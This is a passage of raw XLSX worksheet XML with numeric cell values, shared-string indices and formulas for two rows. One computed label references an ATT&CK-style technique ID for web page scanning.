        <v>0</v>
      </c>
      <c r="PF100" s="120">
        <v>0</v>
      </c>
      <c r="PG100" s="120"/>
      <c r="PH100" s="120">
        <v>0</v>
      </c>
      <c r="PI100" s="464">
        <v>0</v>
      </c>
      <c r="PJ100" s="120">
        <v>0</v>
      </c>
      <c r="PK100" s="120">
        <v>0</v>
      </c>
      <c r="PL100" s="120">
        <v>0</v>
      </c>
      <c r="PM100" s="120"/>
      <c r="PN100" s="120">
        <v>0</v>
      </c>
      <c r="PO100" s="464">
        <v>0</v>
      </c>
      <c r="PP100" s="120">
        <v>0</v>
      </c>
      <c r="PQ100" s="120">
        <v>0</v>
      </c>
      <c r="PR100" s="120">
        <v>0</v>
      </c>
      <c r="PS100" s="120"/>
      <c r="PT100" s="120">
        <v>0</v>
      </c>
      <c r="PU100" s="464">
        <v>0</v>
      </c>
      <c r="PV100" s="120">
        <v>1</v>
      </c>
      <c r="PW100" s="120">
        <v>1</v>
      </c>
      <c r="PX100" s="120">
        <v>1</v>
      </c>
      <c r="PY100" s="120" t="s">
        <v>4439</v>
      </c>
      <c r="PZ100" s="120">
        <v>1</v>
      </c>
      <c r="QA100" s="464">
        <v>1</v>
      </c>
      <c r="QB100" s="120">
        <v>3</v>
      </c>
      <c r="QC100" s="120">
        <v>3</v>
      </c>
      <c r="QD100" s="120">
        <v>3</v>
      </c>
      <c r="QE100" s="120" t="s">
        <v>4444</v>
      </c>
      <c r="QF100" s="120">
        <v>2</v>
      </c>
      <c r="QG100" s="464">
        <v>3</v>
      </c>
      <c r="QH100" s="120">
        <v>16</v>
      </c>
      <c r="QI100" s="120">
        <v>16</v>
      </c>
      <c r="QJ100" s="120">
        <v>14</v>
      </c>
      <c r="QK100" s="120" t="s">
        <v>3336</v>
      </c>
      <c r="QL100" s="120">
        <v>2</v>
      </c>
      <c r="QM100" s="464">
        <v>14</v>
      </c>
      <c r="QN100" s="120">
        <v>0</v>
      </c>
      <c r="QO100" s="120">
        <v>0</v>
      </c>
      <c r="QP100" s="120">
        <v>0</v>
      </c>
      <c r="QQ100" s="120"/>
      <c r="QR100" s="120">
        <v>0</v>
      </c>
      <c r="QS100" s="464">
        <v>0</v>
      </c>
      <c r="QT100" s="184"/>
      <c r="QU100" s="184"/>
      <c r="QV100" s="184"/>
      <c r="QW100" s="184"/>
      <c r="QX100" s="184"/>
      <c r="QY100" s="184"/>
      <c r="QZ100" s="184"/>
      <c r="RA100" s="184"/>
      <c r="RB100" s="184"/>
      <c r="RC100" s="184"/>
      <c r="RD100" s="184"/>
      <c r="RE100" s="184"/>
      <c r="RF100" s="184"/>
      <c r="RG100" s="184"/>
      <c r="RH100" s="184"/>
      <c r="RI100" s="184"/>
      <c r="RJ100" s="184"/>
      <c r="RK100" s="184"/>
      <c r="RL100" s="184"/>
      <c r="RM100" s="184"/>
      <c r="RN100" s="184"/>
      <c r="RO100" s="184"/>
      <c r="RP100" s="184"/>
      <c r="RQ100" s="184"/>
      <c r="RR100" s="184"/>
      <c r="RS100" s="184"/>
      <c r="RT100" s="184"/>
      <c r="RU100" s="184"/>
      <c r="RV100" s="184"/>
      <c r="RW100" s="184"/>
      <c r="RX100" s="184"/>
      <c r="RY100" s="184"/>
      <c r="RZ100" s="184"/>
      <c r="SA100" s="184"/>
      <c r="SB100" s="184"/>
      <c r="SC100" s="184"/>
      <c r="SD100" s="184"/>
      <c r="SE100" s="184"/>
      <c r="SF100" s="184"/>
      <c r="SG100" s="184"/>
      <c r="SH100" s="184"/>
      <c r="SI100" s="184"/>
      <c r="SJ100" s="184"/>
      <c r="SK100" s="184"/>
      <c r="SL100" s="184"/>
      <c r="SM100" s="184"/>
      <c r="SN100" s="184"/>
      <c r="SO100" s="184"/>
      <c r="SP100" s="184"/>
      <c r="SQ100" s="184"/>
      <c r="SR100" s="184"/>
      <c r="SS100" s="184"/>
      <c r="ST100" s="184"/>
      <c r="SU100" s="184"/>
      <c r="SV100" s="184"/>
      <c r="SW100" s="184"/>
      <c r="SX100" s="184"/>
      <c r="SY100" s="184"/>
      <c r="SZ100" s="184"/>
      <c r="TA100" s="184"/>
      <c r="TB100" s="184"/>
      <c r="TC100" s="184"/>
      <c r="TD100" s="184"/>
      <c r="TE100" s="184"/>
      <c r="TF100" s="184"/>
      <c r="TG100" s="184"/>
      <c r="TH100" s="184"/>
      <c r="TI100" s="184"/>
      <c r="TJ100" s="184"/>
      <c r="TK100" s="184"/>
      <c r="TL100" s="184"/>
      <c r="TM100" s="184"/>
      <c r="TN100" s="184"/>
      <c r="TO100" s="184"/>
      <c r="TP100" s="184"/>
      <c r="TQ100" s="184"/>
      <c r="TR100" s="184"/>
      <c r="TS100" s="184"/>
      <c r="TT100" s="184"/>
      <c r="TU100" s="184"/>
      <c r="TV100" s="184"/>
      <c r="TW100" s="184"/>
      <c r="TX100" s="184"/>
      <c r="TY100" s="184"/>
      <c r="TZ100" s="184"/>
      <c r="UA100" s="184"/>
      <c r="UB100" s="184"/>
      <c r="UC100" s="184"/>
      <c r="UD100" s="184"/>
      <c r="UE100" s="184"/>
      <c r="UF100" s="184"/>
      <c r="UG100" s="184"/>
      <c r="UH100" s="184"/>
      <c r="UI100" s="184"/>
      <c r="UJ100" s="184"/>
      <c r="UK100" s="184"/>
      <c r="UL100" s="184"/>
      <c r="UM100" s="184"/>
      <c r="UN100" s="184"/>
      <c r="UO100" s="184"/>
      <c r="UP100" s="184"/>
      <c r="UQ100" s="184"/>
      <c r="UR100" s="184"/>
      <c r="US100" s="184"/>
      <c r="UT100" s="184"/>
      <c r="UU100" s="184"/>
      <c r="UV100" s="184"/>
      <c r="UW100" s="184"/>
      <c r="UX100" s="184"/>
      <c r="UY100" s="184"/>
      <c r="UZ100" s="184"/>
      <c r="VA100" s="184"/>
      <c r="VB100" s="184"/>
      <c r="VC100" s="184"/>
      <c r="VD100" s="184"/>
      <c r="VE100" s="184"/>
      <c r="VF100" s="184"/>
      <c r="VG100" s="184"/>
      <c r="VH100" s="184"/>
      <c r="VI100" s="184"/>
      <c r="VJ100" s="184"/>
      <c r="VK100" s="184"/>
      <c r="VL100" s="184"/>
      <c r="VM100" s="184"/>
      <c r="VN100" s="184"/>
      <c r="VO100" s="184"/>
      <c r="VP100" s="184"/>
      <c r="VQ100" s="184"/>
      <c r="VR100" s="184"/>
      <c r="VS100" s="184"/>
      <c r="VT100" s="184"/>
      <c r="VU100" s="184"/>
      <c r="VV100" s="184"/>
      <c r="VW100" s="184"/>
      <c r="VX100" s="184"/>
      <c r="VY100" s="184"/>
    </row>
    <row r="101" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A101" s="82" t="s">
        <v>153</v>
      </c>
      <c r="B101" s="94" t="s">
        <v>4</v>
      </c>
      <c r="C101" s="83" t="s">
        <v>557</v>
      </c>
      <c r="D101" s="83" t="s">
        <v>156</v>
      </c>
      <c r="E101" s="83">
        <f t="shared" si="5"/>
        <v>68</v>
      </c>
      <c r="F101" s="83" t="s">
        <v>157</v>
      </c>
      <c r="G101" s="94" t="s">
        <v>1632</v>
      </c>
      <c r="H101" s="83" t="s">
        <v>1633</v>
      </c>
      <c r="I101" s="81" t="s">
        <v>1634</v>
      </c>
      <c r="J101" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K101" s="81" t="s">
        <v>1635</v>
      </c>
      <c r="L101" s="81" t="s">
        <v>1636</v>
      </c>
      <c r="M101" s="378" t="s">
        <v>260</v>
      </c>
      <c r="N101" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O101" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P101" s="91"/>
      <c r="Q101" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R101" s="92" t="s">
        <v>1637</v>
      </c>
      <c r="S101" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T101" s="92" t="s">
        <v>1638</v>
      </c>
      <c r="U101" s="199" t="s">
        <v>1639</v>
      </c>
      <c r="V101" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W101" s="96" t="s">
        <v>1640</v>
      </c>
      <c r="X101" s="97" t="s">
        <v>1641</v>
      </c>
      <c r="Y101" s="83" t="s">
        <v>1642</v>
      </c>
      <c r="Z101" s="98" t="s">
        <v>1643</v>
      </c>
      <c r="AA101" s="205" t="s">
        <v>745</v>
      </c>
      <c r="AB101" s="206" t="s">
        <v>745</v>
      </c>
      <c r="AC101" s="386" t="s">
        <v>745</v>
      </c>
      <c r="AD101" s="197"/>
      <c r="AE101" s="197"/>
      <c r="AF101" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG101" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH101" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI101" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ101" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK101" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL101" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM101" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN101" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO101" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP101" s="385" t="str">
        <f>M101&amp;"-frag"</f>
        <v>T1595.003-Web_page_scanning1-frag</v>
      </c>
      <c r="AQ101" s="651">
        <v>181</v>
      </c>
      <c r="AR101" s="303"/>
      <c r="AS101" s="647">
        <v>180</v>
      </c>
      <c r="AT101" s="647">
        <v>0</v>
      </c>
      <c r="AU101" s="647">
        <v>180</v>
      </c>
      <c r="AV101" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW101" s="100">
        <v>180</v>
      </c>
      <c r="AX101" s="100">
        <v>180</v>
      </c>
      <c r="AY101" s="100">
        <v>0</v>
      </c>
      <c r="AZ101" s="100">
        <v>180</v>
      </c>
      <c r="BA101" s="381" t="s">
        <v>4910</v>
      </c>
      <c r="BB101" s="101">
        <v>0</v>
      </c>
      <c r="BC101" s="102">
        <v>0</v>
      </c>
      <c r="BD101" s="102">
        <v>0</v>
      </c>
      <c r="BE101" s="103">
        <v>0</v>
      </c>
      <c r="BF101" s="103">
        <v>0</v>
      </c>
      <c r="BG101" s="104">
        <v>0</v>
      </c>
      <c r="BH101" s="105">
        <v>0</v>
      </c>
      <c r="BI101" s="106">
        <v>0</v>
      </c>
      <c r="BJ101" s="497">
        <v>0</v>
      </c>
      <c r="BK101" s="107">
        <v>0</v>
      </c>
      <c r="BL101" s="107">
        <v>0</v>
      </c>
      <c r="BM101" s="108">
        <v>0</v>
      </c>
      <c r="BN101" s="109">
        <v>0</v>
      </c>
      <c r="BO101" s="110">
        <v>0</v>
      </c>
      <c r="BP101" s="501">
        <v>0</v>
      </c>
      <c r="BQ101" s="111">
        <v>0</v>
      </c>
      <c r="BR101" s="111">
        <v>0</v>
      </c>
      <c r="BS101" s="112">
        <v>0</v>
      </c>
      <c r="BT101" s="113">
        <v>342</v>
      </c>
      <c r="BU101" s="114" t="s">
        <v>3940</v>
      </c>
      <c r="BV101" s="503">
        <v>342</v>
      </c>
      <c r="BW101" s="115" t="s">
        <v>3941</v>
      </c>
      <c r="BX101" s="115">
        <v>3</v>
      </c>
      <c r="BY101" s="116">
        <v>171</v>
      </c>
      <c r="BZ101" s="250">
        <v>175</v>
      </c>
      <c r="CA101" s="251" t="s">
        <v>3942</v>
      </c>
      <c r="CB101" s="505">
        <v>173</v>
      </c>
      <c r="CC101" s="252" t="s">
        <v>3943</v>
      </c>
      <c r="CD101" s="252">
        <v>5</v>
      </c>
      <c r="CE101" s="253">
        <v>58</v>
      </c>
      <c r="CF101" s="101">
        <v>517</v>
      </c>
      <c r="CG101" s="102" t="s">
        <v>2121</v>
      </c>
      <c r="CH101" s="102">
        <v>515</v>
      </c>
      <c r="CI101" s="103" t="s">
        <v>2122</v>
      </c>
      <c r="CJ101" s="103">
        <v>8</v>
      </c>
      <c r="CK101" s="104">
        <v>171</v>
      </c>
      <c r="CL101" s="105">
        <v>0</v>
      </c>
      <c r="CM101" s="106">
        <v>0</v>
      </c>
      <c r="CN101" s="497">
        <v>0</v>
      </c>
      <c r="CO101" s="107">
        <v>0</v>
      </c>
      <c r="CP101" s="107">
        <v>0</v>
      </c>
      <c r="CQ101" s="108">
        <v>0</v>
      </c>
      <c r="CR101" s="109">
        <v>0</v>
      </c>
      <c r="CS101" s="110">
        <v>0</v>
      </c>
      <c r="CT101" s="501">
        <v>0</v>
      </c>
      <c r="CU101" s="111">
        <v>0</v>
      </c>
      <c r="CV101" s="111">
        <v>0</v>
      </c>
      <c r="CW101" s="112">
        <v>0</v>
      </c>
      <c r="CX101" s="113">
        <v>0</v>
      </c>
      <c r="CY101" s="114">
        <v>0</v>
      </c>
      <c r="CZ101" s="503">
        <v>0</v>
      </c>
      <c r="DA101" s="115">
        <v>0</v>
      </c>
      <c r="DB101" s="115">
        <v>0</v>
      </c>
      <c r="DC101" s="116">
        <v>0</v>
      </c>
      <c r="DD101" s="101">
        <v>0</v>
      </c>
      <c r="DE101" s="102">
        <v>0</v>
      </c>
      <c r="DF101" s="102">
        <v>0</v>
      </c>
      <c r="DG101" s="103">
        <v>0</v>
      </c>
      <c r="DH101" s="103">
        <v>0</v>
      </c>
      <c r="DI101" s="104">
        <v>0</v>
      </c>
      <c r="DJ101" s="105">
        <v>0</v>
      </c>
      <c r="DK101" s="106">
        <v>0</v>
      </c>
      <c r="DL101" s="497">
        <v>0</v>
      </c>
      <c r="DM101" s="107">
        <v>0</v>
      </c>
      <c r="DN101" s="107">
        <v>0</v>
      </c>
      <c r="DO101" s="108">
        <v>0</v>
      </c>
      <c r="DP101" s="109">
        <v>0</v>
      </c>
      <c r="DQ101" s="110">
        <v>0</v>
      </c>
      <c r="DR101" s="501">
        <v>0</v>
      </c>
      <c r="DS101" s="111">
        <v>0</v>
      </c>
      <c r="DT101" s="111">
        <v>0</v>
      </c>
      <c r="DU101" s="112">
        <v>0</v>
      </c>
      <c r="DV101" s="113">
        <v>342</v>
      </c>
      <c r="DW101" s="114" t="s">
        <v>3940</v>
      </c>
      <c r="DX101" s="503">
        <v>342</v>
      </c>
      <c r="DY101" s="115" t="s">
        <v>3941</v>
      </c>
      <c r="DZ101" s="115">
        <v>3</v>
      </c>
      <c r="EA101" s="116">
        <v>171</v>
      </c>
      <c r="EB101" s="250">
        <v>114</v>
      </c>
      <c r="EC101" s="251" t="s">
        <v>3944</v>
      </c>
      <c r="ED101" s="505">
        <v>114</v>
      </c>
      <c r="EE101" s="252" t="s">
        <v>3945</v>
      </c>
      <c r="EF101" s="252">
        <v>2</v>
      </c>
      <c r="EG101" s="253">
        <v>57</v>
      </c>
      <c r="EH101" s="101">
        <v>456</v>
      </c>
      <c r="EI101" s="102" t="s">
        <v>3946</v>
      </c>
      <c r="EJ101" s="102">
        <v>456</v>
      </c>
      <c r="EK101" s="103" t="s">
        <v>3947</v>
      </c>
      <c r="EL101" s="103">
        <v>5</v>
      </c>
      <c r="EM101" s="104">
        <v>171</v>
      </c>
      <c r="EN101" s="105">
        <v>0</v>
      </c>
      <c r="EO101" s="106">
        <v>0</v>
      </c>
      <c r="EP101" s="497">
        <v>0</v>
      </c>
      <c r="EQ101" s="107">
        <v>0</v>
      </c>
      <c r="ER101" s="107">
        <v>0</v>
      </c>
      <c r="ES101" s="108">
        <v>0</v>
      </c>
      <c r="ET101" s="109">
        <v>0</v>
      </c>
      <c r="EU101" s="110">
        <v>0</v>
      </c>
      <c r="EV101" s="501">
        <v>0</v>
      </c>
      <c r="EW101" s="111">
        <v>0</v>
      </c>
      <c r="EX101" s="111">
        <v>0</v>
      </c>
      <c r="EY101" s="112">
        <v>0</v>
      </c>
      <c r="EZ101" s="113">
        <v>0</v>
      </c>
      <c r="FA101" s="114">
        <v>0</v>
      </c>
      <c r="FB101" s="503">
        <v>0</v>
      </c>
      <c r="FC101" s="115">
        <v>0</v>
      </c>
      <c r="FD101" s="115">
        <v>0</v>
      </c>
      <c r="FE101" s="116">
        <v>0</v>
      </c>
      <c r="FF101" s="101">
        <v>0</v>
      </c>
      <c r="FG101" s="102">
        <v>0</v>
      </c>
      <c r="FH101" s="102">
        <v>0</v>
      </c>
      <c r="FI101" s="103">
        <v>0</v>
      </c>
      <c r="FJ101" s="103">
        <v>0</v>
      </c>
      <c r="FK101" s="104">
        <v>0</v>
      </c>
      <c r="FL101" s="105">
        <v>0</v>
      </c>
      <c r="FM101" s="106">
        <v>0</v>
      </c>
      <c r="FN101" s="497">
        <v>0</v>
      </c>
      <c r="FO101" s="107">
        <v>0</v>
      </c>
      <c r="FP101" s="107">
        <v>0</v>
      </c>
      <c r="FQ101" s="108">
        <v>0</v>
      </c>
      <c r="FR101" s="109">
        <v>0</v>
      </c>
      <c r="FS101" s="110">
        <v>0</v>
      </c>
      <c r="FT101" s="501">
        <v>0</v>
      </c>
      <c r="FU101" s="111">
        <v>0</v>
      </c>
      <c r="FV101" s="111">
        <v>0</v>
      </c>
      <c r="FW101" s="112">
        <v>0</v>
      </c>
      <c r="FX101" s="113">
        <v>0</v>
      </c>
      <c r="FY101" s="114">
        <v>0</v>
      </c>
      <c r="FZ101" s="503">
        <v>0</v>
      </c>
      <c r="GA101" s="115">
        <v>0</v>
      </c>
      <c r="GB101" s="115">
        <v>0</v>
      </c>
      <c r="GC101" s="116">
        <v>0</v>
      </c>
      <c r="GD101" s="250">
        <v>4</v>
      </c>
      <c r="GE101" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF101" s="505">
        <v>2</v>
      </c>
      <c r="GG101" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH101" s="252">
        <v>2</v>
      </c>
      <c r="GI101" s="253">
        <v>1</v>
      </c>
      <c r="GJ101" s="101">
        <v>4</v>
      </c>
      <c r="GK101" s="102" t="s">
        <v>1902</v>
      </c>
      <c r="GL101" s="102">
        <v>2</v>
      </c>
      <c r="GM101" s="103" t="s">
        <v>1903</v>
      </c>
      <c r="GN101" s="103">
        <v>2</v>
      </c>
      <c r="GO101" s="104">
        <v>1</v>
      </c>
      <c r="GP101" s="105">
        <v>0</v>
      </c>
      <c r="GQ101" s="106">
        <v>0</v>
      </c>
      <c r="GR101" s="497">
        <v>0</v>
      </c>
      <c r="GS101" s="107">
        <v>0</v>
      </c>
      <c r="GT101" s="107">
        <v>0</v>
      </c>
      <c r="GU101" s="108">
        <v>0</v>
      </c>
      <c r="GV101" s="109">
        <v>0</v>
      </c>
      <c r="GW101" s="110">
        <v>0</v>
      </c>
      <c r="GX101" s="501">
        <v>0</v>
      </c>
      <c r="GY101" s="111">
        <v>0</v>
      </c>
      <c r="GZ101" s="111">
        <v>0</v>
      </c>
      <c r="HA101" s="112">
        <v>0</v>
      </c>
      <c r="HB101" s="113">
        <v>0</v>
      </c>
      <c r="HC101" s="114">
        <v>0</v>
      </c>
      <c r="HD101" s="503">
        <v>0</v>
      </c>
      <c r="HE101" s="115">
        <v>0</v>
      </c>
      <c r="HF101" s="115">
        <v>0</v>
      </c>
      <c r="HG101" s="116">
        <v>0</v>
      </c>
      <c r="HH101" s="101">
        <v>0</v>
      </c>
      <c r="HI101" s="102">
        <v>0</v>
      </c>
      <c r="HJ101" s="102">
        <v>0</v>
      </c>
      <c r="HK101" s="103">
        <v>0</v>
      </c>
      <c r="HL101" s="103">
        <v>0</v>
      </c>
      <c r="HM101" s="104">
        <v>0</v>
      </c>
      <c r="HN101" s="105">
        <v>0</v>
      </c>
      <c r="HO101" s="106">
        <v>0</v>
      </c>
      <c r="HP101" s="497">
        <v>0</v>
      </c>
      <c r="HQ101" s="107">
        <v>0</v>
      </c>
      <c r="HR101" s="107">
        <v>0</v>
      </c>
      <c r="HS101" s="108">
        <v>0</v>
      </c>
      <c r="HT101" s="109">
        <v>0</v>
      </c>
      <c r="HU101" s="110">
        <v>0</v>
      </c>
      <c r="HV101" s="501">
        <v>0</v>
      </c>
      <c r="HW101" s="111">
        <v>0</v>
      </c>
      <c r="HX101" s="111">
        <v>0</v>
      </c>
      <c r="HY101" s="112">
        <v>0</v>
      </c>
      <c r="HZ101" s="113">
        <v>0</v>
      </c>
      <c r="IA101" s="114">
        <v>0</v>
      </c>
      <c r="IB101" s="503">
        <v>0</v>
      </c>
      <c r="IC101" s="115">
        <v>0</v>
      </c>
      <c r="ID101" s="115">
        <v>0</v>
      </c>
      <c r="IE101" s="116">
        <v>0</v>
      </c>
      <c r="IF101" s="250">
        <v>57</v>
      </c>
      <c r="IG101" s="251" t="s">
        <v>3948</v>
      </c>
      <c r="IH101" s="505">
        <v>57</v>
      </c>
      <c r="II101" s="252" t="s">
        <v>3077</v>
      </c>
      <c r="IJ101" s="252">
        <v>1</v>
      </c>
      <c r="IK101" s="253">
        <v>57</v>
      </c>
      <c r="IL101" s="101">
        <v>57</v>
      </c>
      <c r="IM101" s="102" t="s">
        <v>3948</v>
      </c>
      <c r="IN101" s="102">
        <v>57</v>
      </c>
      <c r="IO101" s="103" t="s">
        <v>3077</v>
      </c>
      <c r="IP101" s="103">
        <v>1</v>
      </c>
      <c r="IQ101" s="104">
        <v>57</v>
      </c>
      <c r="IR101" s="105">
        <v>0</v>
      </c>
      <c r="IS101" s="106">
        <v>0</v>
      </c>
      <c r="IT101" s="497">
        <v>0</v>
      </c>
      <c r="IU101" s="107">
        <v>0</v>
      </c>
      <c r="IV101" s="107">
        <v>0</v>
      </c>
      <c r="IW101" s="108">
        <v>0</v>
      </c>
      <c r="IX101" s="109">
        <v>0</v>
      </c>
      <c r="IY101" s="110">
        <v>0</v>
      </c>
      <c r="IZ101" s="501">
        <v>0</v>
      </c>
      <c r="JA101" s="111">
        <v>0</v>
      </c>
      <c r="JB101" s="111">
        <v>0</v>
      </c>
      <c r="JC101" s="112">
        <v>0</v>
      </c>
      <c r="JD101" s="113">
        <v>0</v>
      </c>
      <c r="JE101" s="114">
        <v>0</v>
      </c>
      <c r="JF101" s="503">
        <v>0</v>
      </c>
      <c r="JG101" s="115">
        <v>0</v>
      </c>
      <c r="JH101" s="115">
        <v>0</v>
      </c>
      <c r="JI101" s="116">
        <v>0</v>
      </c>
      <c r="JJ101" s="101">
        <v>0</v>
      </c>
      <c r="JK101" s="102">
        <v>0</v>
      </c>
      <c r="JL101" s="102">
        <v>0</v>
      </c>
      <c r="JM101" s="103">
        <v>0</v>
      </c>
      <c r="JN101" s="103">
        <v>0</v>
      </c>
      <c r="JO101" s="104">
        <v>0</v>
      </c>
      <c r="JP101" s="105">
        <v>0</v>
      </c>
      <c r="JQ101" s="106">
        <v>0</v>
      </c>
      <c r="JR101" s="497">
        <v>0</v>
      </c>
      <c r="JS101" s="107">
        <v>0</v>
      </c>
      <c r="JT101" s="107">
        <v>0</v>
      </c>
      <c r="JU101" s="108">
        <v>0</v>
      </c>
      <c r="JV101" s="109">
        <v>0</v>
      </c>
      <c r="JW101" s="110">
        <v>0</v>
      </c>
      <c r="JX101" s="501">
        <v>0</v>
      </c>
      <c r="JY101" s="111">
        <v>0</v>
      </c>
      <c r="JZ101" s="111">
        <v>0</v>
      </c>
      <c r="KA101" s="112">
        <v>0</v>
      </c>
      <c r="KB101" s="113">
        <v>0</v>
      </c>
      <c r="KC101" s="114">
        <v>0</v>
      </c>
      <c r="KD101" s="503">
        <v>0</v>
      </c>
      <c r="KE101" s="115">
        <v>0</v>
      </c>
      <c r="KF101" s="115">
        <v>0</v>
      </c>
      <c r="KG101" s="116">
        <v>0</v>
      </c>
      <c r="KH101" s="250">
        <v>0</v>
      </c>
      <c r="KI101" s="251">
        <v>0</v>
      </c>
      <c r="KJ101" s="505">
        <v>0</v>
      </c>
      <c r="KK101" s="252">
        <v>0</v>
      </c>
      <c r="KL101" s="252">
        <v>0</v>
      </c>
      <c r="KM101" s="253">
        <v>0</v>
      </c>
      <c r="KN101" s="101">
        <v>0</v>
      </c>
      <c r="KO101" s="102">
        <v>0</v>
      </c>
      <c r="KP101" s="102">
        <v>0</v>
      </c>
      <c r="KQ101" s="103">
        <v>0</v>
      </c>
      <c r="KR101" s="103">
        <v>0</v>
      </c>
      <c r="KS101" s="104">
        <v>0</v>
      </c>
      <c r="KT101" s="105">
        <v>0</v>
      </c>
      <c r="KU101" s="106">
        <v>0</v>
      </c>
      <c r="KV101" s="497">
        <v>0</v>
      </c>
      <c r="KW101" s="107">
        <v>0</v>
      </c>
      <c r="KX101" s="107">
        <v>0</v>
      </c>
      <c r="KY101" s="108">
        <v>0</v>
      </c>
      <c r="KZ101" s="109">
        <v>0</v>
      </c>
      <c r="LA101" s="110">
        <v>0</v>
      </c>
      <c r="LB101" s="501">
        <v>0</v>
      </c>
      <c r="LC101" s="111">
        <v>0</v>
      </c>
      <c r="LD101" s="111">
        <v>0</v>
      </c>
      <c r="LE101" s="112">
        <v>0</v>
      </c>
      <c r="LF101" s="113">
        <v>0</v>
      </c>
      <c r="LG101" s="114">
        <v>0</v>
      </c>
      <c r="LH101" s="503">
        <v>0</v>
      </c>
      <c r="LI101" s="115">
        <v>0</v>
      </c>
      <c r="LJ101" s="115">
        <v>0</v>
      </c>
      <c r="LK101" s="116">
        <v>0</v>
      </c>
      <c r="LL101" s="117">
        <v>171</v>
      </c>
      <c r="LM101" s="507">
        <v>171</v>
      </c>
      <c r="LN101" s="119">
        <v>0</v>
      </c>
      <c r="LO101" s="119">
        <v>1</v>
      </c>
      <c r="LP101" s="119">
        <v>171</v>
      </c>
      <c r="LQ101" s="119">
        <v>0</v>
      </c>
      <c r="LR101" s="119">
        <v>171</v>
      </c>
      <c r="LS101" s="119">
        <v>171</v>
      </c>
      <c r="LT101" s="382"/>
      <c r="LU101" s="117">
        <v>0</v>
      </c>
      <c r="LV101" s="118">
        <v>0</v>
      </c>
      <c r="LW101" s="507">
        <v>0</v>
      </c>
      <c r="LX101" s="119">
        <v>0</v>
      </c>
      <c r="LY101" s="119">
        <v>0</v>
      </c>
      <c r="LZ101" s="119">
        <v>0</v>
      </c>
      <c r="MA101" s="117">
        <v>0</v>
      </c>
      <c r="MB101" s="118">
        <v>0</v>
      </c>
      <c r="MC101" s="507">
        <v>0</v>
      </c>
      <c r="MD101" s="119">
        <v>0</v>
      </c>
      <c r="ME101" s="119">
        <v>0</v>
      </c>
      <c r="MF101" s="119">
        <v>0</v>
      </c>
      <c r="MG101" s="117">
        <v>0</v>
      </c>
      <c r="MH101" s="118">
        <v>0</v>
      </c>
      <c r="MI101" s="507">
        <v>0</v>
      </c>
      <c r="MJ101" s="119">
        <v>0</v>
      </c>
      <c r="MK101" s="119">
        <v>0</v>
      </c>
      <c r="ML101" s="119">
        <v>0</v>
      </c>
      <c r="MM101" s="117">
        <v>0</v>
      </c>
      <c r="MN101" s="118">
        <v>0</v>
      </c>
      <c r="MO101" s="507">
        <v>0</v>
      </c>
      <c r="MP101" s="119">
        <v>0</v>
      </c>
      <c r="MQ101" s="119">
        <v>0</v>
      </c>
      <c r="MR101" s="119">
        <v>0</v>
      </c>
      <c r="MS101" s="117">
        <v>0</v>
      </c>
      <c r="MT101" s="118">
        <v>0</v>
      </c>
      <c r="MU101" s="507">
        <v>0</v>
      </c>
      <c r="MV101" s="119">
        <v>0</v>
      </c>
      <c r="MW101" s="119">
        <v>0</v>
      </c>
      <c r="MX101" s="119">
        <v>0</v>
      </c>
      <c r="MY101" s="117">
        <v>0</v>
      </c>
      <c r="MZ101" s="118">
        <v>0</v>
      </c>
      <c r="NA101" s="507">
        <v>0</v>
      </c>
      <c r="NB101" s="119">
        <v>0</v>
      </c>
      <c r="NC101" s="119">
        <v>0</v>
      </c>
      <c r="ND101" s="119">
        <v>0</v>
      </c>
      <c r="NE101" s="117">
        <v>0</v>
      </c>
      <c r="NF101" s="118">
        <v>0</v>
      </c>
      <c r="NG101" s="507">
        <v>0</v>
      </c>
      <c r="NH101" s="119">
        <v>0</v>
      </c>
      <c r="NI101" s="119">
        <v>0</v>
      </c>
      <c r="NJ101" s="119">
        <v>0</v>
      </c>
      <c r="NK101" s="117">
        <v>171</v>
      </c>
      <c r="NL101" s="118" t="s">
        <v>4424</v>
      </c>
      <c r="NM101" s="507">
        <v>171</v>
      </c>
      <c r="NN101" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO101" s="119">
        <v>1</v>
      </c>
      <c r="NP101" s="119">
        <v>171</v>
      </c>
      <c r="NQ101" s="117">
        <v>0</v>
      </c>
      <c r="NR101" s="118">
        <v>0</v>
      </c>
      <c r="NS101" s="507">
        <v>0</v>
      </c>
      <c r="NT101" s="119">
        <v>0</v>
      </c>
      <c r="NU101" s="119">
        <v>0</v>
      </c>
      <c r="NV101" s="119">
        <v>0</v>
      </c>
      <c r="NW101" s="117">
        <v>0</v>
      </c>
      <c r="NX101" s="118">
        <v>0</v>
      </c>
      <c r="NY101" s="507">
        <v>0</v>
      </c>
      <c r="NZ101" s="119">
        <v>0</v>
      </c>
      <c r="OA101" s="119">
        <v>0</v>
      </c>
      <c r="OB101" s="119">
        <v>0</v>
      </c>
      <c r="OC101" s="120">
        <v>191</v>
      </c>
      <c r="OD101" s="120">
        <v>191</v>
      </c>
      <c r="OE101" s="120">
        <v>4</v>
      </c>
      <c r="OF101" s="121">
        <v>1</v>
      </c>
      <c r="OG101" s="120">
        <v>169</v>
      </c>
      <c r="OH101" s="120">
        <v>169</v>
      </c>
      <c r="OI101" s="120">
        <v>169</v>
      </c>
      <c r="OJ101" s="120">
        <v>169</v>
      </c>
      <c r="OK101" s="383"/>
      <c r="OL101" s="120">
        <v>183</v>
      </c>
      <c r="OM101" s="120">
        <v>183</v>
      </c>
      <c r="ON101" s="120">
        <v>183</v>
      </c>
      <c r="OO101" s="120" t="s">
        <v>3949</v>
      </c>
